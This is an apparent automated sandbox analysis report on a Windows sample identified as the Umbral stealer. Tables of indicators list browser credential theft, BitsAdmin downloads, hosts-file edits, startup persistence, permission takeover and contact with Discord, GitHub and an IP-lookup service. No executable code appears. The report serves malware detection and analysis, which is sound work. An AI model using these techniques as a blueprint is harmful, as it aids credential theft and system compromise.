Analysis Overview
SHA256
cc13206ad514d61c7ea83f9380a571b93e23faafa829b04e877fcd38b4e83b75
Threat Level: Known bad
The file test.exe was found to be: Known bad.
Malicious Activity Summary
Umbral
Detect Umbral payload
Credentials from Password Stores: Credentials from Web Browsers
Blocklisted process makes network request
Download via BitsAdmin
Possible privilege escalation attempt
Command and Scripting Interpreter: PowerShell
Drops file in Drivers directory
Downloads MZ/PE file
Checks computer location settings
Modifies file permissions
Executes dropped EXE
Drops startup file
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Enumerates connected drives
Sets desktop wallpaper using registry
Drops file in Program Files directory
System Network Configuration Discovery: Internet Connection Discovery
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Runs ping.exe
Detects videocard installed
Views/modifies file attributes
Modifies registry class
Suspicious use of WriteProcessMemory
Script User-Agent
Delays execution with timeout.exe
Kills process with taskkill
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-09 10:50
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-09 10:50
Reported
2024-08-09 10:53
Platform
win10v2004-20240802-en
Max time kernel
105s
Max time network
115s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Umbral
Credentials from Password Stores: Credentials from Web Browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Umbral.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\test.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat | C:\Windows\system32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\melter.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\A: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\WScript.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\classes.jsa | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\melter.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Umbral.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Umbral.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
